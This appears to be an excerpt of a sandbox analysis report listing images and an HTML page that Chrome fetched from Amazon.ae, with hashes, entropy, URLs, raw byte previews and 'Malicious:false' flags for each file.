                                                                                                                                                                                                                                                                      Size (bytes):71
                                                                                                                                                                                                                                                                      Entropy (8bit):4.19644707821733
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                                                                                      MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                                                                                      SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                                                                                      SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                                                                                      SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):3952
                                                                                                                                                                                                                                                                      Entropy (8bit):7.8691105697407
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:aHcnrbhNFJum6ejWeT5j4pJLfZvopc/QpCg6hJThvtJ:jhjJuSjFd4LfJopc/Q4n/7
                                                                                                                                                                                                                                                                      MD5:CA72B29D84196B73C9A165D2FB463D0A
                                                                                                                                                                                                                                                                      SHA1:14B5C3A85FCC86CB9D7A1DA0E22F581344A4CAB9
                                                                                                                                                                                                                                                                      SHA-256:2586A5BAF4ECB01862548A5FC9C2A3A488763DD8114AD8F2A49830FC704E7D1F
                                                                                                                                                                                                                                                                      SHA-512:6F0BB4C6E2C03B38DAE4179E69901BF771ED0C67CCC5E42E5642AE8BFD5A748C33CC67AA9EEA33F1F181F9872829E91304E43061555ED4DBD48EA94F8F58600A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/OHL/BTS/QC/Updated/2407GH048_AE_OHL_DQC_Pricepoint_Outdoor_EN_1x._SY116_CB567104843_.jpg
                                                                                                                                                                                                                                                                      Preview:........................................................#"""#''''''''''..................................................!! !!''''''''''..........Adobe.d...........t...."........................................................................................!..1"AQa2Rq...#46Bbr..5st....$%...........................!..1A.2Qaq..."3R....Br#Cb..............?..iJWNy(.)H.R...)H.R...)H.R...)H.R...)H.R...)H...iJWNy(.)H.R......O.1..y=.W..|....=.<....YUY..e<.8..R..I,r.>.XG..{V..2........;:....Cy.[.`..m...Oi....7.}k.5\8}...ge..X....9^E.....F.N...|8.F...%....=....=.n.P.\X.Y...C..o.P. J..].....l.9,..?.......sm.%3x..#...[.cm......3.;{..f...Z.....V.....w^..T...MVz.Th.#...-.).5._.m...(Z.l.{.1H^U....._...KE....K./rv.......> a.6.$q..$......w...n.dj.{......Y..@..PJ.9.l.G.....W.....{..Onn,PH.(.J...)..,..X...yrG.....f.$.m......"..x...T..)P...7.....igX.\&C.u..2t,..P..d.{<.;..5.o.F.......{.V..F7.....Kl.?.N...q..M/.'...Q.>.G....~.f....].....t......[..p.H8.+...l}+`.H..=...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines (14498)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):545493
                                                                                                                                                                                                                                                                      Entropy (8bit):5.555598958445951
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:6144:ndfesugkIPtgGLrbrT8vJpphDUwGJQivLwbRUvGFE:Je9IiGLrbrT8eqU9
                                                                                                                                                                                                                                                                      MD5:461D87C4C93A294DDE79D2BA4ADBBFD6
                                                                                                                                                                                                                                                                      SHA1:049F155EE475001E6F897687D16BD67DBEDDFAC7
                                                                                                                                                                                                                                                                      SHA-256:99270A1BDE77708F4379E57031A7C1660994897457ADBC5BB63B91065D736F9F
                                                                                                                                                                                                                                                                      SHA-512:1440F13B6038CD3EAF403A84D9DB817392481078F70307C9B380378FCFEAC614C5C3883477FDD39BB46739EAACAB79B4DC8A4DE13F8DCF47A1A88FF452775970
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://www.amazon.ae/l/15149894031/?_encoding=UTF8&pd_rd_w=vdKJ7&content-id=amzn1.sym.0e2c3eeb-0b89-4f8d-9470-ba5240f72926&pf_rd_p=0e2c3eeb-0b89-4f8d-9470-ba5240f72926&pf_rd_r=APAVCQJMFK78QJEV1PMZ&pd_rd_wg=vThym&pd_rd_r=eb837932-48d0-4d35-b743-a6bf62f5a886&ref_=pd_hp_d_atf_unk
                                                                                                                                                                                                                                                                      Preview:<!doctype html><html lang="en-ae" class="a-no-js" data-19ax5a9jf="dingo"> sp:feature:head-start -->.<head><script>var aPageStart = (new Date()).getTime();</script><meta charset="utf-8"/>. sp:end-feature:head-start -->. sp:feature:csm:head-open-part1 -->..<script type='text/javascript'>var ue_t0=ue_t0||+new Date();</script>. sp:end-feature:csm:head-open-part1 -->. sp:feature:cs-optimization -->.<meta http-equiv='x-dns-prefetch-control' content='on'>.<link rel="dns-prefetch" href="https://images-eu.ssl-images-amazon.com">.<link rel="dns-prefetch" href="https://m.media-amazon.com">.<link rel="dns-prefetch" href="https://completion.amazon.com">. sp:end-feature:cs-optimization -->. sp:feature:csm:head-open-part2 -->.<script type='text/javascript'>.window.ue_ihb = (window.ue_ihb || window.ueinit || 0) + 1;.if (window.ue_ihb === 1) {..var ue_csm = window,. ue_hob = +new Date();.(function(d){var e=d.ue=d.ue||{},f=Date.now||function(){return+new Date};e.d=function
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):3683
                                                                                                                                                                                                                                                                      Entropy (8bit):7.885143961741562
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:Tu95NlWq9w4RbZluU6BUlTpUIFSK+6vzja:C95NIq9wOUU6OlXx+szW
                                                                                                                                                                                                                                                                      MD5:5D696105C36B598568169C5C4B725C64
                                                                                                                                                                                                                                                                      SHA1:0C7129A666167A62B944445F5C702952353A9303
                                                                                                                                                                                                                                                                      SHA-256:241AF2152C537513CB097AA493D36E1D764011E35C28C5D35FA15B1B7530A7C2
                                                                                                                                                                                                                                                                      SHA-512:0EE2CEAF6A6F5C79729A115F9F8D44FB6C4D7E8FBAD5407B109F6FED1E3FBCEBADB8EA3F63781AF71EAD3D788200DB9DB961A9F33938C6DF54550E8CA44A9841
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!1."Aa2Q.q..#%3brt.......s....BT.......................................................1!.."aq..Q..23AR.............?...R.%.)J.JR.R....(.)X.^l$G...\.."i.E.7....C......Pr..s.D.+\G. .$.\{oy.?...u..,....T,1.Snv..#<.Ac..A..Kw>h.u.2...C.F.......=C..H...i..)JP.JR.R....(.)J.JR.R..9..\....~'....Fn..un.W.~...P..Y-.U..J...m<...:jW........J.....Rv.69.?.......),q=.....~......:l.JFp2.`{...*...Kna.A...__..(U.Hoa...0%@p.1.~k......A........Ve..t.._..([vQ.JR..R......+.c#wo_S.\....)Z...s....[k{.ayd1.-...bQ:.>U..u..;_.F.?.*7..j.Z....14x.k.ob. ...5.o.._.^?.u=].5..'..#$a6............c.JU.2......$.H1...I;.........xr..r.#.:.......a.W:.3.+.m.-,R@...pU..qT....}M....k.pyK.F...3/.$.`G...!.[....dx......)...z6....~.Z][...eS.c....U".......,.\'.......7C.0@$z.Vu`.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):37910
                                                                                                                                                                                                                                                                      Entropy (8bit):7.924016843263766
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:4YyyJKmksBfERqzsH5iew5btGXW5vnCi3acsJ1c96CZ:4GKQBsRCsZidBoH/c96Y
                                                                                                                                                                                                                                                                      MD5:F8D8EA55A9A7F266C9A0A2E7B12B04F0
                                                                                                                                                                                                                                                                      SHA1:68010AE410A617FF68B6977C3267CEAA5D0646FA
                                                                                                                                                                                                                                                                      SHA-256:47337007455C6EBE9FF6F394D1E6E3A6AE9863CB4C7A7FC264ECF23D0EAACF33
                                                                                                                                                                                                                                                                      SHA-512:9FA66959FCA6E8A33BE5FF5C41BA17C178534C249AB266D04CC3651EE65F5EF957E43BF2BF202DE9606C5687BD55DA4F8898A1B02D3197E0736DBFB0ED4730AC
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/Associates/2407GH040_AE_PD23_GW_bubbler_SL_Backpaksshoesclothing_400x400_EN._CB567012733_.jpg
                                                                                                                                                                                                                                                                      Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x500, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):42482
                                                                                                                                                                                                                                                                      Entropy (8bit):7.980199111880759
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:1+Rp5bUEDD+04AhUy5j7cKjZw3g2OV3VnqJhYyHx8/Xeg9hb9ZBwVrGReeSoNf3u:AJIEP6i/jFsgXioXLb9XwVrWZ3/Ns
                                                                                                                                                                                                                                                                      MD5:A6685C2BE6804CE57563EFCD2CE2E2CA
                                                                                                                                                                                                                                                                      SHA1:C4EA06CCE4EEB31A97CAF6893B64F9AF68BE07B8
                                                                                                                                                                                                                                                                      SHA-256:F9E43A4FD24E0468E3269353A461BB1C05F797BE9590E283470DED40D4DEFBDE
                                                                                                                                                                                                                                                                      SHA-512:CE0D0CF2A5DACD73EF6B740FAAD1B15573ED2FA851B45851AB75641D11DEE95CA8E885539C46DE6B22DA87D2223406BF47134F76A69D5AA784004621B65EAB5F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."..................................................wY...6t...C.|.S^..S...38V...-./m...kb....w:...5z..2CE'....Z..9...s...)...b<.e.VUy..wG.;F..2.,.g.b.i.4.x4......u..F'...2.V...m.VTT.a..I.pQDU.vz.......C&.......l...7..WM> ....u.`{]S..M}....AW_Fmk....0..e..lF..o..Y..cEk....b.i..s....kq$...dm.......{,.Q....<..$z] ...A..pL......]m......$..'.}mCA.yJo..A...Z.]...|......l;<..B.p..,........\...+.C.`.)...^L....S@...o....>J.g3..|._V vV.5y0f...d.+UC.4{ "..R..M'."....5=w.K....-..!.+9..........g.g2.....(..h...^..6...........o.....<..2..ew..D...>%.0-...m^.=u........|.Y..L...H....)7..].k..9..j......P..h.....9skq...Xj..p......c...;.T.i...!Y...%....|vv*...2......Z.h.c..z.U..Xy.j1...kO...o<.b.(..6..K4.x..x..s...j.7.|......y........ .....[.:..=.u...YU.1....u.J.E......i>.....y....fR.q....cO...s.....n2.;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):13437
                                                                                                                                                                                                                                                                      Entropy (8bit):7.879103466630641
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:/SDsx3H9AprwViqyg/iNmEsh38SCOQmF2gID0q:Lx3dKrwNy2rChm+D0q
                                                                                                                                                                                                                                                                      MD5:387052049FA9877016FF089E0420F0A4
                                                                                                                                                                                                                                                                      SHA1:0A217B7D470A41968465B5EE15A35553F364D711
                                                                                                                                                                                                                                                                      SHA-256:44A79CCF5D4C1585CF73F19CFDEDB2AF2C626EFA717EE5C2876B60BDD491D116
                                                                                                                                                                                                                                                                      SHA-512:87BF02F9139C6DABC90134D322D66FDADF0F745251FFF8DBCFD2E0B89137FE39EEA60E08E516CD2B677E2A813042ED4A9D17FB45322E22BDAAAB235177F5929C
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3................................................................`............................................................................P.h.7..."e.I'..jn^...Y.W+..q)..#._.H..1....1..................Y....W\_..v\.....^Z2..gz...9c.p....J.[.7."+J.]/.@............^....E5..U.wK.(.\.n.s.N.^...W..o..;..u.e_.4.......6H.kj.....B...`f...........L.cV.....u......s.v._].c_..^wNf.,......3....~....+|]....j.h2.tr._j....B.e.\:...........&...^..Z...7\..!..n.........r.J.S.8...e.........+.........S.5..g..>.I.ky.]............Uz.G.Y....r{...........{.[....#.H.$*Nxm..s..;..\.O.]^...]z..)..N.K...N.s..z...$....:.........*q.j...&....3..A.&......!...>>H=9.....k.....c.#....;...n... .{'.ej1Y+...2..,n..`...........)......}hC.i...p.....>G.m.>S......C.7..[g.`..,nI1.;..F..7sU=y.rs......s..,..f9....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):1888
                                                                                                                                                                                                                                                                      Entropy (8bit):7.5917338157932415
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:TT0kNw8jM2kM8or0g/qQEl8QwsSYdLtyBNDV9U1CQznX:TMAMy8sDZa8nKeBR4QQznX
                                                                                                                                                                                                                                                                      MD5:4A63B2280F3E13B697E5F0391C9633F7
                                                                                                                                                                                                                                                                      SHA1:DE3DCE1178A4C966D65763D5AAD0BDD07078D540
                                                                                                                                                                                                                                                                      SHA-256:8984CB5A520E6CE7843C2FD8711FBE2D7081CDD31AA3BA1A4E512D9C973618EE
                                                                                                                                                                                                                                                                      SHA-512:47BBAE2F375554915173CD7E3498885720655766C9736D2189B49CC92069B295CC86D87170455ACF4171F41E83E302812F48C1961F95CC8937B5CC892A13C127
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/VAS_MENA/2024/GW/QC/Furniture/XCM_CUTTLE_ORIGIN_1707658_3701318_186x116_1X_en_AE_Version_3._SY116_CB561430975_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..........2................................................................v..........#I%;.[.KzQ#....j..[T..@....2..%..kX........zR(.......ZmQ:...5}+.......N....d.^y7..';.}..7.z9..B.sgO.9...].}...[...N@...B..+..........;.hy..F...41H......?A. .S.b>".*...UZ.V>.*.X..[.?n.0.. ...................?...@..........................!AQ..."12R.....0a...Bq.....#S`b$3r..........?....X.3.N\.h.I01.8..........?.y.x.A.e..O.?..W.i..y.\ I...?/.....[SN.i.hB........Z.q.....2D...I.p1...>A.d.o..hV=....<.J...I.&.p.."..9u:.}.$...W...u.RB.H.!Z...|.)Zd1.-.P7.'.........._@..,;...V..t..t+Xr..(...JA.4o2.o..v`..Yqv.7S..~..6R.b."..r.(J.\...bDa.+TI.N.2....2...-..^;.!iA..(..E.I....U......\B..\...x.o.....}Hum)Z.+._.....Ah.2Nu$\C.T..&..i[.?..M.`8..$....I6H......u..@>&%.j..X...W....N.@J....-R......... ......>....6RS..-..PR..@..)...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):6554
                                                                                                                                                                                                                                                                      Entropy (8bit):7.862122932809133
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:T4wHKxWbJhjSeHJItLGK5TDROUmTRtQJZg4/n:7HqKJhjuGK5TD4UmLQJN/n
                                                                                                                                                                                                                                                                      MD5:C9A5645A4DCA49A5282B3D7E5CB17161
                                                                                                                                                                                                                                                                      SHA1:2C512849E6BA664B28EF87830254C759264398F5
                                                                                                                                                                                                                                                                      SHA-256:99153D6D6F665CF5BD44BEFFEE420F57A51F3E1FDA32A4A7E7ED0C0742CD6635
                                                                                                                                                                                                                                                                      SHA-512:B6426FEF443E28590824F4C864EDC783BF198F356DBCCBF52AFBC76C960A4EA5D269DB11ED6BB90B1E141D02D263312B9094390FD4CA5B525DC59D55D079E7FC
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................`..........................Kq1..7.WL?....r^..R."2..sL=}z..k..P.(.Q(/...v2.......Z..R.Y.rGb._d".s..G..q..GU.&...VG...}.Gz\.^......W;.@...../4BEp..t|...TCs..$..e.L-.}>N..{...t0..X^..u8...y..e.[............bLO8...z..&M..lm....}I..}..cS.k1.r'.....#..l..q.......D.C.N.9....j....g.......Sj.p.U...S.&.....r.,.e.__.....#.:..s._0...V...c..-_..WS.W..[.O.-...'R..F.6..%..]lW......;1T...r...^..Z..e..Fn.......3........7...C...a.N....W..............p......Xc;5....p3v3....q.w.zU.S.:e........\m.0K.b+.......d...5..|.U|uy......'k=.?....?....0.....lpG)..{..$./%..v3.....9r.o....0....3.>`{......j...O..{.E..5...6".Yl$.....c+.......!.......:AEH.....|2....%E.n......sk......^m.vC6Z.T.c+........Fz.A3.8...3*...*...*....-...Z_...$}>.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 91x90, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):978
                                                                                                                                                                                                                                                                      Entropy (8bit):7.7929026074761
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:24:0D41C3iNm5kblwqXS3lvoxOR7mcXCS1k3J6p5r4qUo+BF:W41C3iNm2XS3lvmImcSSG324qUo+BF
                                                                                                                                                                                                                                                                      MD5:95BD6FE838D5BBA90DA2DC9B9A67D41F
                                                                                                                                                                                                                                                                      SHA1:CC3957744DC6069315394A484A8B4EE3BF276C17
                                                                                                                                                                                                                                                                      SHA-256:BB36C0FC740A3A08E97B9A8550A86C39B25C093AC5EDA93534EED537094AF026
                                                                                                                                                                                                                                                                      SHA-512:29995F6108BA527CCB0866FCA81C0C20BA1416622C07BF197520006F1683634F18FAE49A2989A44E253F4191C61D6916EA98D36C78B7F66DCD4664F7B857C2DA
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:RIFF....WEBPVP8 .........*[.Z.?...Z.'$/).K1.1.....=.$........O.Q..5....9.e.X.?..x......;.n^..'.."...}.....-4\.I.O.Z.yqg]+...q..4.I..#<.....o.e!%.ek.l..F..|r.\..\J.BzT.30.?..k...._.2,Wnw..PQ.:.z.......D....@C..\`..1Z.....=*..C...d.z..;Ln.|u.A........)..X.c7E......C#.@....p...e.......3.vO.....Vw......ew......p6......b......;.....O.......`.m...,......m.E.O.R..#..F...q...b`.D...-zS..Z.9k..&..."YY.,..Yk..S\..eh^..q`...;..g./.:..\..|......r....7*..P5U...... ..Pp..L$.+kd.].g2..=.+8."...+..q!....w.N...H...............J..bh,..?.Z....d.;jo.h.(.}....];.n.....b.mm.l.....D)K>M.i.....SM...x]5%..\.Q..x...`..[...0.B.n_c1.w.r.!NN.vG..W.........F.3..o..50E.1...{.....1..e.#..^...Z..xx..*....n..Ot.n.C......6A.b\.b....bW...6..S.mV.w.9.......6E>.Q.n.M...e;J.h..m..=1....].k..v.s...k....I..(h...)k...I6..u..O.....)....z..?.n}K........."...?.._...po....A.X.j..l....;*.aXB...q...7.l........j.T9...9.%..i.....a=.b~..D.7..,.X.^.<........!...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 440x300, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):30634
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9233565379999416
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:a9ob/hXAJSGzlKwtckMm1kEhJkMRPrLAbWm:CoVX+7zl5tltJLVL8Wm
                                                                                                                                                                                                                                                                      MD5:CE0A83960C7365654C3011E6D620DDFE
                                                                                                                                                                                                                                                                      SHA1:AFC77A5E27F89C844FF2F343E0EBA9B19187F679
                                                                                                                                                                                                                                                                      SHA-256:EE85E44E1CAF49A252BADE5A729D7168B0C1EE1A88A8E22FB32E7ED4DB5F1808
                                                                                                                                                                                                                                                                      SHA-512:2ACDCBBB508F2BE5EF754237D4C78BE5D22F0279FCCF0B5026B75991844EE51461D6B180E21B0335695692634645DC05949C375BF50198DA1BFF8A1D5AEDBED6
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/rbs_ohl_Gold/xcm_banners_mena_440x300_coop_4col_phl-gradenessentials_440x300_ae-en.jpg
                                                                                                                                                                                                                                                                      Preview:.....C....................................................................C.......................................................................,...."...........................................K..............................!..1Q.A..."aq#23.$%...&48Rrs.....5:BDbtv.....................................<..........................!..1."A..#2Qaq....$BR..3..%&5...............?..C..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1....ts..u.....e.Rw.J..v ......Q....[9O...u..{...:.....eSRL.y%}.. ...g2......{.w...B.pHL."?O(.%.....w..8...z.wq..9...1.o._...;...D?..g ?A....].NU..(.z..H..%7...A....t....E.8...D...l..A.c..I.}.....u........#....V."bL...C.B...p...=..!.H....J=.C.....btT.c.J.ap.....R.Q8.....~a.d...O........x..?.|....>G../.......Vh.G..2....v.....y..U1{/_..$#.t_|....U...E.R.+.l .L....s...^.2f/.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 188x320, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):15963
                                                                                                                                                                                                                                                                      Entropy (8bit):7.975973504578183
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:PbXxPZN6x6WCsuc3tfrQAHK5AoZeGgxWw7bMdcv742T6KQXf:P1Ku2pQ0KmmeGwWnAKKQXf
                                                                                                                                                                                                                                                                      MD5:93E7EB5432BBF33250500EBA76D0B0BA
                                                                                                                                                                                                                                                                      SHA1:B6299C425626FF8527D68D944512AD18CE10B130
                                                                                                                                                                                                                                                                      SHA-256:1177402393985E6258F5F067EF2D265169D9D29F205171D6342AB62CB9B8EC8A
                                                                                                                                                                                                                                                                      SHA-512:1D96CAD40D8E3C5800E783C53500D25B2E45AE21C4FF8B31EBBEDAFB6E7366F21DE8BDA0BC3415C1A1878AE22C1E24790399F660D16568E953CED37678D654B2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71D3hzqn5rL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."................................................................!1..AQ"2aq...t....#356BRu..$Cbr..S.......4DTs........Ec....................................................!1."AQq..23a......#4B...CRS..............?.2.++(.......@P....Mm$...&(H7.s...9..9!|....'................^.7./..[[.F.K.%.X.oD..v..i.U....@..)`-o.s..nQ..?..+.;...|........u..Yhmz..,.....V......w...S..o\H...Ot.~...4..`.....e.B..7...6......1......vJ....?.j........f.6....Z.........n..(.sI..P{..5a.T.....c....G......'I.......(mZ.(...}.P..\..Lk(.Q.T.O.3@.N"..}..n.d.(.Z[.:.......Z...iW9.x..<v.#.#J(....M....9t>c../.v..\8.2....s......{.z.......q....M.;0$...-..O..U.........+++(.....-.._....Ktb..(......v.p.4{|.&)......}...9...'..I.....T.ab.9..Y.._$.,.....,.E..C."F.A.H ....z...s..8.#.j........k..IKy.P.....jf..C.VQ.T.z..0.N.I.XW=..}s....t.b:.g.t..z
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:APAVCQJMFK78QJEV1PMZ$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295396.0%26id%3DAPAVCQJMFK78QJEV1PMZ%26m%3D1%26sc%3Dcsa%3Alcp%26lcp%3D2008%26pc%3D51727%26at%3D51727%26t%3D1724264970921%26csmtags%3Daui%3Asw%3Abrowser%3Aregister%3Asupported%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DAPAVCQJMFK78QJEV1PMZ%26aftb%3D1%26lob%3D1:51726
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x500, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):25718
                                                                                                                                                                                                                                                                      Entropy (8bit):7.966320871762345
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:1+G8MpQcJbYQbHK1+TdMeEuI+WHUvLJm/BDx7oTuepiVyPdWHvmnVlBSXTv6K4Mx:1+GPjhvTdkuIpYJmJDCpiEFWPmxaTvdx
